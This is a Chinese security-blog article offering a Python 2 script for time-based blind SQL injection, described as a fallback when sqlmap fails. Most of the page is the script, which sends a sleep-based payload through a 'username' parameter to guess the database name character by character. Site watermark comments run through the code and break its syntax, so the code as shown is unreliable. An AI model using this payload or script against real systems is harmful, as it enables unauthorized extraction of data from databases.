安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 编程茶楼 > Python > SQL延时注入脚本

SQL延时注入脚本

时间:2016-02-23来源:未知 作者:沦沦点击:
很多白帽们应该都会有一个体会,在sqlmap神器中跑延时注入时会跑不出数据,原因是因为它可能过滤了一部份的sql语句,这时就需要我们进行构造语句来进行注入,构造完成之后还需要一个好的脚本进行自动让它跑一遍,在这里分

很多白帽们应该都会有一个体会,在sqlmap神器中跑延时注入时会跑不出数据,原因是因为它可能过滤了一部份的sql语句,这时就需要我们进行构造语句来进行注入,构造完成之后还需要一个好的脚本进行自动让它跑一遍,在这里分析一个脚本给大家,延时注入用它基本是通用的。(只需要改动一下相关的payload) //copyright AnYun.ORG

//内容来自AnYun.ORG

#encoding=gbk

//安云网,anyun.org

import httplib //安云网,anyun.org

import time //ANYUN.ORG

import string

//安云网,anyun.org

import sys

//ANYUN.ORG

import random

//内容来自安云网

import urllib

//安云网咨询系统


//安云网,anyun.org

headers = { //安云网,anyun.org

'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',

//内容来自安云网

'Cookie':''

//内容来自AnYun.ORG

} //安云网,anyun.org


//copyright AnYun.ORG

payloads = list(string.ascii_lowercase)

//安云网咨询系统

for i in range(0,10):

//安云网,anyun.org

payloads.append(str(i))

//内容来自安云网

payloads += ['@','_', '.', '-', '\\', ' ','~']

//本文来自安云网

print 'Try to retrive database:' //内容来自安云网

database = '' //ANYUN.ORG

for i in range(1,11): //本文来自安云网

for payload in payloads: //内容来自安云网

try:

//copyright AnYun.ORG

conn = httplib.HTTPConnection('127.0.0.1', timeout=5) #目标地址 //内容来自AnYun.ORG

s = " AND (SELECT * FROM (SELECT(if(ascii(substr(database(),%s,1))=%s,sleep(5),0)))oWxq) AND 'ABC'='ABC" % (i, ord(payload)) #写入构造好的payload

//本文来自安云网

params = "username=xxx'" + urllib.quote(s) #注入的参数

//内容来自AnYun.ORG

conn.request(method='GET', url= '/test.php?' + params, #对应的文件

//安云网咨询系统

headers = headers)

//内容来自AnYun.ORG

html_doc = conn.getresponse().read()

//安云网,anyun.org

conn.close()

//内容来自安云网

print '+',

//ANYUN.ORG

except Exception, e: //安云网,anyun.org

print e

//ANYUN.ORG

database += payload //安云网咨询系统

print '\n[*]', database //安云网,anyun.org

break

//本文来自安云网


//ANYUN.ORG

print '\n[Done] datase is:', database //安云网,anyun.org



//copyright AnYun.ORG

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容